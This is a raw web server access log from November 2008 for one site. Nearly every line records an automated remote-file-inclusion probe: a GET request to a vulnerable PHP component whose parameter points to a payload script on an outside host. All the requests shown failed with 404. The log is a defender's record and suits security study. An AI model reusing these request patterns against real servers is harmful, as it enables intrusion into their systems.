65.38.105.213 - - [09/Nov/2008:17:41:06 -0800] "GET /components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://members.lycos.co.uk/sider007/ideex.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.vspeaking.com"
65.38.105.213 - - [09/Nov/2008:17:41:06 -0800] "GET /logs/components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://members.lycos.co.uk/sider007/ideex.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.vspeaking.com"
66.135.37.24 - - [09/Nov/2008:17:42:34 -0800] "GET /logs/access.log/mosConfig_absolute_path.%22/mambots/content/multithumb/http://www.beschorner86.de/cms//modules/cmd/cid.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.vspeaking.com"
66.135.37.24 - - [09/Nov/2008:17:42:34 -0800] "GET /logs/access.log/mosConfig_absolute_path.%22/mambots/content/multithumb/http://www.beschorner86.de/cms//modules/cmd/cid.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.vspeaking.com"
66.135.37.24 - - [09/Nov/2008:17:42:34 -0800] "GET /mosConfig_absolute_path.%22/mambots/content/multithumb/http://www.beschorner86.de/cms//modules/cmd/cid.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.vspeaking.com"
66.135.37.24 - - [09/Nov/2008:17:42:34 -0800] "GET /mosConfig_absolute_path.%22/mambots/content/multithumb/http://www.beschorner86.de/cms//modules/cmd/cid.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.vspeaking.com"
66.135.37.24 - - [09/Nov/2008:17:42:34 -0800] "GET /logs/mosConfig_absolute_path.%22/mambots/content/multithumb/http://www.beschorner86.de/cms//modules/cmd/cid.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.vspeaking.com"
66.135.37.24 - - [09/Nov/2008:17:42:34 -0800] "GET /logs/mosConfig_absolute_path.%22/mambots/content/multithumb/http://www.beschorner86.de/cms//modules/cmd/cid.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.vspeaking.com"
66.135.37.24 - - [09/Nov/2008:17:43:40 -0800] "GET /logs/access.log/mosConfig_absolute_path.%22/mambots/content/multithumb/http://www.beschorner86.de/cms//modules/cmd/cid.txt??? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.vspeaking.com"
66.135.37.24 - - [09/Nov/2008:17:43:40 -0800] "GET /mosConfig_absolute_path.%22/mambots/content/multithumb/http://www.beschorner86.de/cms//modules/cmd/cid.txt??? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.vspeaking.com"
66.135.37.24 - - [09/Nov/2008:17:44:06 -0800] "GET /mosConfig_absolute_path.%22/mambots/content/multithumb/http://www.beschorner86.de/cms//modules/cmd/cid.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.vspeaking.com"
211.115.110.118 - - [09/Nov/2008:17:45:25 -0800] "GET /administrator/components/com_pollxt/conf.pollxt.php?mosConfig_absolute_path=http://dwcable.co.kr/technote/board/.or/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.vspeaking.com"
211.115.110.161 - - [09/Nov/2008:17:45:41 -0800] "GET /administrator/components/com_pollxt/conf.pollxt.php?mosConfig_absolute_path=http://dwcable.co.kr/technote/board/.or/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.vspeaking.com"
209.85.108.8 - - [09/Nov/2008:17:46:12 -0800] "GET /logs/access_080825.log//components/com_flyspray/startdown.php?file=http://www.geocities.com/aank44/safe.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.vspeaking.com"
203.152.222.4 - - [09/Nov/2008:17:48:43 -0800] "GET /logs/access.log//faqsupport/samplefaqsupport.php?path%5Bdocroot%5D=http://www.asa.ba/eng/administrator/components/com_admin/romid.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.vspeaking.com"
203.152.222.4 - - [09/Nov/2008:17:48:43 -0800] "GET /faqsupport/samplefaqsupport.php?path%5Bdocroot%5D=http://www.asa.ba/eng/administrator/components/com_admin/romid.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.vspeaking.com"
203.152.222.4 - - [09/Nov/2008:17:48:44 -0800] "GET /logs//faqsupport/samplefaqsupport.php?path%5Bdocroot%5D=http://www.asa.ba/eng/administrator/components/com_admin/romid.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.vspeaking.com"
65.38.105.213 - - [09/Nov/2008:17:50:44 -0800] "GET /logs/components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://members.lycos.co.uk/sider007/ideex.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.vspeaking.com"
65.38.105.213 - - [09/Nov/2008:17:50:44 -0800] "GET /components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://members.lycos.co.uk/sider007/ideex.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.vspeaking.com"
88.80.202.189 - - [09/Nov/2008:17:51:24 -0800] "GET /logs/access_080825.log//components/com_flyspray/startdown.php?file=http://www.geocities.com/aank44/safe.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.vspeaking.com"
88.80.202.189 - - [09/Nov/2008:17:51:29 -0800] "GET /logs/access_080825.log//components/com_flyspray/startdown.php?file=http://www.geocities.com/aank44/safe.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.vspeaking.com"
216.70.72.201 - - [09/Nov/2008:17:54:21 -0800] "GET /logs//components/com_pollxt/conf.pollxt.php?mosConfig_absolute_path=http://www.woonwinkel-zevenaar.nl/components/com_user/pulaid.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.1) Gecko/20060918 Firefox/2.0" "www.vspeaking.com"
216.70.72.201 - - [09/Nov/2008:17:54:21 -0800] "GET /logs/access_080825.log//components/com_pollxt/conf.pollxt.php?mosConfig_absolute_path=http://www.woonwinkel-zevenaar.nl/components/com_user/pulaid.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.1) Gecko/20060918 Firefox/2.0" "www.vspeaking.com"
216.70.72.201 - - [09/Nov/2008:17:54:22 -0800] "GET /components/com_pollxt/conf.pollxt.php?mosConfig_absolute_path=http://www.woonwinkel-zevenaar.nl/components/com_user/pulaid.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.1) Gecko/20060918 Firefox/2.0" "www.vspeaking.com"
216.70.72.201 - - [09/Nov/2008:17:55:03 -0800] "GET /logs/access_080721.log//components/com_pollxt/conf.pollxt.php?mosConfig_absolute_path=http://www.woonwinkel-zevenaar.nl/components/com_user/pulaid.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.1) Gecko/20060918 Firefox/2.0" "www.vspeaking.com"
94.23.10.29 - - [09/Nov/2008:17:56:52 -0800] "GET /index.php?sourcedir=http://www.vidinas.net/includes/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.vspeaking.com"
94.23.10.29 - - [09/Nov/2008:17:56:52 -0800] "GET /logs/access.log/index.php?sourcedir=http://www.vidinas.net/includes/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.vspeaking.com"
94.23.10.29 - - [09/Nov/2008:17:56:52 -0800] "GET /logs/index.php?sourcedir=http://www.vidinas.net/includes/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.vspeaking.com"
216.70.72.201 - - [09/Nov/2008:17:57:19 -0800] "GET /logs/access.log//components/com_pollxt/conf.pollxt.php?mosConfig_absolute_path=http://www.woonwinkel-zevenaar.nl/components/com_user/pulaid.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.1) Gecko/20060918 Firefox/2.0" "www.vspeaking.com"
216.70.72.201 - - [09/Nov/2008:17:57:19 -0800] "GET /logs/access.log%22%20class=%22neww%22%20target=%22_blank%22%20title=%22Im%20neuen%20Fenster%20öffnen//components/com_pollxt/conf.pollxt.php?mosConfig_absolute_path=http://www.woonwinkel-zevenaar.nl/components/com_user/pulaid.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.1) Gecko/20060918 Firefox/2.0" "www.vspeaking.com"
70.84.182.98 - - [09/Nov/2008:18:00:25 -0800] "GET /logs//components/com_pollxt/conf.pollxt.php?mosConfig_absolute_path=http://www.woonwinkel-zevenaar.nl/components/com_user/pulaid.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.7.8) Gecko/20050511" "www.vspeaking.com"
70.84.182.98 - - [09/Nov/2008:18:00:25 -0800] "GET /logs/access_080825.log//components/com_pollxt/conf.pollxt.php?mosConfig_absolute_path=http://www.woonwinkel-zevenaar.nl/components/com_user/pulaid.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.7.8) Gecko/20050511" "www.vspeaking.com"
70.84.182.98 - - [09/Nov/2008:18:00:26 -0800] "GET /components/com_pollxt/conf.pollxt.php?mosConfig_absolute_path=http://www.woonwinkel-zevenaar.nl/components/com_user/pulaid.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.7.8) Gecko/20050511" "www.vspeaking.com"
94.23.10.29 - - [09/Nov/2008:18:00:44 -0800] "GET /logs/access.log%20%20/index.php?sourcedir=http://www.vidinas.net/includes/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.vspeaking.com"
70.84.182.98 - - [09/Nov/2008:18:01:09 -0800] "GET /logs/access.log//components/com_pollxt/conf.pollxt.php?mosConfig_absolute_path=http://www.woonwinkel-zevenaar.nl/components/com_user/pulaid.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.7.8) Gecko/20050511" "www.vspeaking.com"
70.84.182.98 - - [09/Nov/2008:18:01:09 -0800] "GET /logs/access.log%22%20class=%22neww%22%20target=%22_blank%22%20title=%22Im%20neuen%20Fenster%20öffnen//components/com_pollxt/conf.pollxt.php?mosConfig_absolute_path=http://www.woonwinkel-zevenaar.nl/components/com_user/pulaid.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.7.8) Gecko/20050511" "www.vspeaking.com"
209.85.108.8 - - [09/Nov/2008:18:01:51 -0800] "GET /logs/access_080901.log//index.php?DOCUMENT_ROOT=http://www.geocities.com/aank44/safe.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.vspeaking.com"
209.85.108.8 - - [09/Nov/2008:18:01:51 -0800] "GET /index.php?DOCUMENT_ROOT=http://www.geocities.com/aank44/safe.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.vspeaking.com"
209.85.108.8 - - [09/Nov/2008:18:01:51 -0800] "GET /logs//index.php?DOCUMENT_ROOT=http://www.geocities.com/aank44/safe.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.vspeaking.com"
70.84.182.98 - - [09/Nov/2008:18:02:01 -0800] "GET /logs//mambots/content/multithumb/multithumb.php?mosConfig_absolute_path=http://www.woonwinkel-zevenaar.nl/components/com_user/pulaid.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.7.8) Gecko/20050511" "www.vspeaking.com"
70.84.182.98 - - [09/Nov/2008:18:02:03 -0800] "GET /logs/access.log//mambots/content/multithumb/multithumb.php?mosConfig_absolute_path=http://www.woonwinkel-zevenaar.nl/components/com_user/pulaid.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.7.8) Gecko/20050511" "www.vspeaking.com"
70.84.182.98 - - [09/Nov/2008:18:02:04 -0800] "GET /mambots/content/multithumb/multithumb.php?mosConfig_absolute_path=http://www.woonwinkel-zevenaar.nl/components/com_user/pulaid.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.7.8) Gecko/20050511" "www.vspeaking.com"
124.81.96.76 - - [09/Nov/2008:18:02:22 -0800] "GET /logs/access.log//components/com_forum/download.php?phpbb_root_path=http://www.jjran.com/board/skin/zero_vote/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.vspeaking.com"
124.81.96.76 - - [09/Nov/2008:18:02:23 -0800] "GET /components/com_forum/download.php?phpbb_root_path=http://www.jjran.com/board/skin/zero_vote/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.vspeaking.com"
124.81.96.76 - - [09/Nov/2008:18:02:23 -0800] "GET /logs//components/com_forum/download.php?phpbb_root_path=http://www.jjran.com/board/skin/zero_vote/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.vspeaking.com"
200.68.95.210 - - [09/Nov/2008:18:03:51 -0800] "GET /logs/access_080825.log//admin/spaw/spaw_control.class.php?spaw_root=http://www.genesis-auctions.com/images/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.63" "www.vspeaking.com"
200.68.95.210 - - [09/Nov/2008:18:03:51 -0800] "GET /logs/access_080825.log//admin/spaw/spaw_control.class.php?spaw_root=http://face.kapanlagi.com/album/PhotoAlbum/galeri/album1212/bot/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.63" "www.vspeaking.com"
200.68.95.210 - - [09/Nov/2008:18:03:51 -0800] "GET /logs/access_080825.log//admin/spaw/spaw_control.class.php?spaw_root=http://www.genesis-auctions.com/images/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.63" "www.vspeaking.com"
200.68.95.210 - - [09/Nov/2008:18:03:59 -0800] "GET /admin/spaw/spaw_control.class.php?spaw_root=http://www.genesis-auctions.com/images/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.63" "www.vspeaking.com"
200.68.95.210 - - [09/Nov/2008:18:03:59 -0800] "GET /admin/spaw/spaw_control.class.php?spaw_root=http://face.kapanlagi.com/album/PhotoAlbum/galeri/album1212/bot/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.63" "www.vspeaking.com"
200.68.95.210 - - [09/Nov/2008:18:03:59 -0800] "GET /admin/spaw/spaw_control.class.php?spaw_root=http://www.genesis-auctions.com/images/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.63" "www.vspeaking.com"
200.68.95.210 - - [09/Nov/2008:18:04:03 -0800] "GET /logs//admin/spaw/spaw_control.class.php?spaw_root=http://face.kapanlagi.com/album/PhotoAlbum/galeri/album1212/bot/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.63" "www.vspeaking.com"
200.68.95.210 - - [09/Nov/2008:18:04:03 -0800] "GET /logs//admin/spaw/spaw_control.class.php?spaw_root=http://www.genesis-auctions.com/images/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.63" "www.vspeaking.com"
200.68.95.210 - - [09/Nov/2008:18:04:03 -0800] "GET /logs//admin/spaw/spaw_control.class.php?spaw_root=http://www.genesis-auctions.com/images/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.63" "www.vspeaking.com"
211.115.110.161 - - [09/Nov/2008:18:05:16 -0800] "GET /logs/access_080804.log//administrator/components/com_pollxt/conf.pollxt.php?mosConfig_absolute_path=http://dwcable.co.kr/technote/board/.or/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.vspeaking.com"
211.115.110.161 - - [09/Nov/2008:18:05:16 -0800] "GET /administrator/components/com_pollxt/conf.pollxt.php?mosConfig_absolute_path=http://dwcable.co.kr/technote/board/.or/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.vspeaking.com"
211.115.110.161 - - [09/Nov/2008:18:05:17 -0800] "GET /logs//administrator/components/com_pollxt/conf.pollxt.php?mosConfig_absolute_path=http://dwcable.co.kr/technote/board/.or/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.vspeaking.com"
213.203.223.59 - - [09/Nov/2008:18:06:38 -0800] "GET /logs/access_080804.log//bbs//skin/zero_vote/error.php?dir=http://www.pass100.co.kr/LykBoard/image.gif???? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.vspeaking.com"
213.203.223.59 - - [09/Nov/2008:18:06:38 -0800] "GET /bbs//skin/zero_vote/error.php?dir=http://www.pass100.co.kr/LykBoard/image.gif???? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.vspeaking.com"
86.109.103.251 - - [09/Nov/2008:18:06:38 -0800] "GET /logs/access_080804.log//bbs//skin/zero_vote/error.php?dir=http://www.pass100.co.kr/LykBoard/image.gif???? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.vspeaking.com"
86.109.103.251 - - [09/Nov/2008:18:06:39 -0800] "GET /bbs//skin/zero_vote/error.php?dir=http://www.pass100.co.kr/LykBoard/image.gif???? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.vspeaking.com"
213.203.223.59 - - [09/Nov/2008:18:06:40 -0800] "GET /logs/access_080804.log//bbs//skin/zero_vote/error.php?dir=http://www.enjoykankoku.jp/parti/id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.vspeaking.com"
213.203.223.59 - - [09/Nov/2008:18:06:40 -0800] "GET /bbs//skin/zero_vote/error.php?dir=http://www.enjoykankoku.jp/parti/id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.vspeaking.com"
195.12.62.2 - - [09/Nov/2008:18:06:45 -0800] "GET /logs/access_080804.log//bbs//skin/zero_vote/error.php?dir=http://www.pass100.co.kr/LykBoard/image.gif???? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.vspeaking.com"
195.12.62.2 - - [09/Nov/2008:18:06:45 -0800] "GET /bbs//skin/zero_vote/error.php?dir=http://www.pass100.co.kr/LykBoard/image.gif???? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.vspeaking.com"
80.67.20.214 - - [09/Nov/2008:18:06:48 -0800] "GET /logs/access_080804.log//bbs//skin/zero_vote/error.php?dir=http://www.pass100.co.kr/LykBoard/image.gif???? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.vspeaking.com"
67.18.151.242 - - [09/Nov/2008:18:06:49 -0800] "GET /bbs//skin/zero_vote/error.php?dir=http://www.pass100.co.kr/LykBoard/image.gif???? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.vspeaking.com"
86.109.103.251 - - [09/Nov/2008:18:06:49 -0800] "GET /bbs//skin/zero_vote/error.php?dir=http://www.pass100.co.kr/LykBoard/image.gif???? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.vspeaking.com"
80.67.22.215 - - [09/Nov/2008:18:06:50 -0800] "GET /logs/access_080804.log//bbs//skin/zero_vote/error.php?dir=http://www.pass100.co.kr/LykBoard/image.gif???? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.vspeaking.com"
80.67.22.215 - - [09/Nov/2008:18:06:50 -0800] "GET /bbs//skin/zero_vote/error.php?dir=http://www.pass100.co.kr/LykBoard/image.gif???? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.vspeaking.com"
80.67.23.90 - - [09/Nov/2008:18:06:50 -0800] "GET /logs/access_080804.log//bbs//skin/zero_vote/error.php?dir=http://www.pass100.co.kr/LykBoard/image.gif???? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.vspeaking.com"
80.67.20.101 - - [09/Nov/2008:18:06:50 -0800] "GET /logs/access_080804.log//bbs//skin/zero_vote/error.php?dir=http://www.pass100.co.kr/LykBoard/image.gif???? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.vspeaking.com"
213.203.223.59 - - [09/Nov/2008:18:06:52 -0800] "GET /bbs//skin/zero_vote/error.php?dir=http://www.enjoykankoku.jp/parti/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.vspeaking.com"
80.67.23.90 - - [09/Nov/2008:18:06:53 -0800] "GET /bbs//skin/zero_vote/error.php?dir=http://www.pass100.co.kr/LykBoard/image.gif???? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.vspeaking.com"
80.67.20.101 - - [09/Nov/2008:18:06:54 -0800] "GET /bbs//skin/zero_vote/error.php?dir=http://www.pass100.co.kr/LykBoard/image.gif???? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.vspeaking.com"
213.203.223.59 - - [09/Nov/2008:18:06:55 -0800] "GET /bbs//skin/zero_vote/error.php?dir=http://www.pass100.co.kr/LykBoard/image.gif???? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.vspeaking.com"
80.67.23.90 - - [09/Nov/2008:18:06:58 -0800] "GET /bbs//skin/zero_vote/error.php?dir=http://www.pass100.co.kr/LykBoard/image.gif???? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.vspeaking.com"
80.67.20.101 - - [09/Nov/2008:18:07:09 -0800] "GET /bbs//skin/zero_vote/error.php?dir=http://www.pass100.co.kr/LykBoard/image.gif???? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.vspeaking.com"
67.18.151.242 - - [09/Nov/2008:18:07:16 -0800] "GET /logs/access_080804.log//bbs//skin/zero_vote/error.php?dir=http://www.pass100.co.kr/LykBoard/image.gif???? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.vspeaking.com"
67.18.151.242 - - [09/Nov/2008:18:07:16 -0800] "GET /bbs//skin/zero_vote/error.php?dir=http://www.pass100.co.kr/LykBoard/image.gif???? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.vspeaking.com"
67.18.151.242 - - [09/Nov/2008:18:07:16 -0800] "GET /logs//bbs//skin/zero_vote/error.php?dir=http://www.pass100.co.kr/LykBoard/image.gif???? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.vspeaking.com"
80.67.20.214 - - [09/Nov/2008:18:07:17 -0800] "GET /bbs//skin/zero_vote/error.php?dir=http://www.pass100.co.kr/LykBoard/image.gif???? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.vspeaking.com"
193.84.183.38 - - [09/Nov/2008:18:07:24 -0800] "GET /logs/access_080804.log//bbs//skin/zero_vote/error.php?dir=http://www.pass100.co.kr/LykBoard/image.gif???? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.vspeaking.com"
193.84.183.38 - - [09/Nov/2008:18:07:24 -0800] "GET /bbs//skin/zero_vote/error.php?dir=http://www.pass100.co.kr/LykBoard/image.gif???? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.vspeaking.com"
80.67.22.215 - - [09/Nov/2008:18:07:25 -0800] "GET /bbs//skin/zero_vote/error.php?dir=http://www.pass100.co.kr/LykBoard/image.gif???? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.vspeaking.com"
195.12.62.2 - - [09/Nov/2008:18:07:28 -0800] "GET /logs/access_080804.log//bbs//skin/zero_vote/error.php?dir=http://www.pass100.co.kr/LykBoard/image.gif???? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.vspeaking.com"
195.12.62.2 - - [09/Nov/2008:18:07:28 -0800] "GET /bbs//skin/zero_vote/error.php?dir=http://www.pass100.co.kr/LykBoard/image.gif???? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.vspeaking.com"
195.12.62.2 - - [09/Nov/2008:18:07:28 -0800] "GET /logs//bbs//skin/zero_vote/error.php?dir=http://www.pass100.co.kr/LykBoard/image.gif???? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.vspeaking.com"
86.109.103.251 - - [09/Nov/2008:18:07:29 -0800] "GET /logs/access_080804.log//bbs//skin/zero_vote/error.php?dir=http://www.pass100.co.kr/LykBoard/image.gif???? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.vspeaking.com"
86.109.103.251 - - [09/Nov/2008:18:07:30 -0800] "GET /bbs//skin/zero_vote/error.php?dir=http://www.pass100.co.kr/LykBoard/image.gif???? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.vspeaking.com"
86.109.103.251 - - [09/Nov/2008:18:07:30 -0800] "GET /logs//bbs//skin/zero_vote/error.php?dir=http://www.pass100.co.kr/LykBoard/image.gif???? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.vspeaking.com"
213.203.223.59 - - [09/Nov/2008:18:07:31 -0800] "GET /logs/access_080804.log//bbs//skin/zero_vote/error.php?dir=http://www.enjoykankoku.jp/parti/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.vspeaking.com"
213.203.223.59 - - [09/Nov/2008:18:07:31 -0800] "GET /bbs//skin/zero_vote/error.php?dir=http://www.enjoykankoku.jp/parti/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.vspeaking.com"
213.203.223.59 - - [09/Nov/2008:18:07:31 -0800] "GET /logs//bbs//skin/zero_vote/error.php?dir=http://www.enjoykankoku.jp/parti/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.vspeaking.com"
193.84.183.38 - - [09/Nov/2008:18:07:33 -0800] "GET /bbs//skin/zero_vote/error.php?dir=http://www.pass100.co.kr/LykBoard/image.gif???? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.vspeaking.com"
80.67.23.90 - - [09/Nov/2008:18:07:35 -0800] "GET /logs/access_080804.log//bbs//skin/zero_vote/error.php?dir=http://www.pass100.co.kr/LykBoard/image.gif???? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.vspeaking.com"
80.67.23.90 - - [09/Nov/2008:18:07:35 -0800] "GET /bbs//skin/zero_vote/error.php?dir=http://www.pass100.co.kr/LykBoard/image.gif???? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.vspeaking.com"
80.67.23.90 - - [09/Nov/2008:18:07:36 -0800] "GET /logs//bbs//skin/zero_vote/error.php?dir=http://www.pass100.co.kr/LykBoard/image.gif???? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.vspeaking.com"
213.203.223.59 - - [09/Nov/2008:18:07:37 -0800] "GET /logs/access_080804.log//bbs//skin/zero_vote/error.php?dir=http://www.pass100.co.kr/LykBoard/image.gif???? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.vspeaking.com"
213.203.223.59 - - [09/Nov/2008:18:07:38 -0800] "GET /bbs//skin/zero_vote/error.php?dir=http://www.pass100.co.kr/LykBoard/image.gif???? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.vspeaking.com"
213.203.223.59 - - [09/Nov/2008:18:07:38 -0800] "GET /logs//bbs//skin/zero_vote/error.php?dir=http://www.pass100.co.kr/LykBoard/image.gif???? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.vspeaking.com"
190.41.11.250 - - [09/Nov/2008:18:07:54 -0800] "GET /logs/access_080804.log//bbs//skin/zero_vote/error.php?dir=http://www.pass100.co.kr/LykBoard/image.gif???? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.vspeaking.com"
190.41.11.250 - - [09/Nov/2008:18:07:55 -0800] "GET /bbs//skin/zero_vote/error.php?dir=http://www.pass100.co.kr/LykBoard/image.gif???? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.vspeaking.com"
80.67.20.214 - - [09/Nov/2008:18:08:00 -0800] "GET /bbs//skin/zero_vote/error.php?dir=http://www.pass100.co.kr/LykBoard/image.gif???? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.vspeaking.com"
80.67.20.214 - - [09/Nov/2008:18:08:01 -0800] "GET /logs//bbs//skin/zero_vote/error.php?dir=http://www.pass100.co.kr/LykBoard/image.gif???? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.vspeaking.com"
